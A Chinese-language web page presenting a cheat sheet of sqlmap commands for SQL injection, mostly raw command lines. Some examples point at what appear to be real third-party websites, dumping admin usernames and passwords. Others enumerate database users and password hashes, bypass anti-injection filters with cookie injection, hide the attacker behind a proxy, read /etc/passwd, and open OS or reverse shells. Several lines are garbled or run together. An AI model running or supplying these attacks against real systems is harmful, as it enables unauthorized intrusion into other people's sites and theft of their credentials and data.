服务器之家

专注于服务器技术!
当前位置:首页 > 服务器安全 > 安全工具

sqlmap post注入案例 sqlmap常用指令和参数

发布时间:2017-01-19 来源:服务器之家

检查注入点
    sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"
列数据库信息
    sqlmap -u  "http://www.scshlx.com/TeachView.asp?id=21" --dbs
指定库名列出所有表 //最大搜索线程为10
    sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables
指定库名表名列出所有字段
    sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33"  -T "双引号下为指定表名admin" --columns
指定库名表名字段名dump出指定字段的内容
    sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password"
查询表名下所有字段
     sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columns


Mysql注入(有多个库 必须找到有管理员的数据库)
    --is-dba            当前用户权限
    --dbs            所有数据库
    --current-db        网站当前数据库
    --users            所有数据库用户
    --current-user        当前数据库用户
    --tables-D"当前数据库名字"  查表名、
    -T"指定的表名"-D"当前数据库名字"--columns 查字段
Cookie注入(遇到防注入)
    sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2   
    列表名等 在上方代码后面加--tables等;  
 eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username"
有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:
–cookie=COOKIE                                       在需要登录的地方,需要登录后的cookie
–proxy=”http://127.0.0.1:8087″                  使用HTTP代理隐藏自己的身份,比如使用goagent等
–sql-query=QUERY                                     执行一个sql语句,不一定支持
sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定数 据库类型
sqlmap -u “http://url/news?id=1″ -- users 列数据库用户
sqlmap -u “http://url/news?id=1″ -- dbs   列数据库
sqlmap -u “http://url/news?id=1″ -- passwords 数据库用户密码
sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定用户 数据库密码
sqlmap  -u  “http://url/news?id=1″   -- dump  -C  “password,user,id”  -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定字段,列出20 条
sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有数据库所有表
sqlmap -u “http://url/news?id=1″ -- privileges #查看权限
sqlmap -u “http://url/news?id=1″ -- privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
sqlmap -u “http://url/news?id=1″ -- udf-inject #导入用户自定义函数(获取 系统权限!)
sqlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u “http://url/news?id=1″ -- union-cols #union 查询表记录
sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news?id=1″ -- b #获取banner信息
sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入
sqlmap -u “http://url/news?id=1″ - v 1 -f #指纹判别数据库类型
sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入
sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定关键词
sqlmap -u “http://url/news?id=1″ -- sql-shell #执行指定sql命令
sqlmap -u “http://url/news?id=1″ -- file /etc/passwd
sqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #执行系统命令
sqlmap -u “http://url/news?id=1″ -- os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
sqlmap -u “http://url/news?id=1″ -- reg-read #读取win系统注册表
sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#保存进度
sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢复 已保存进度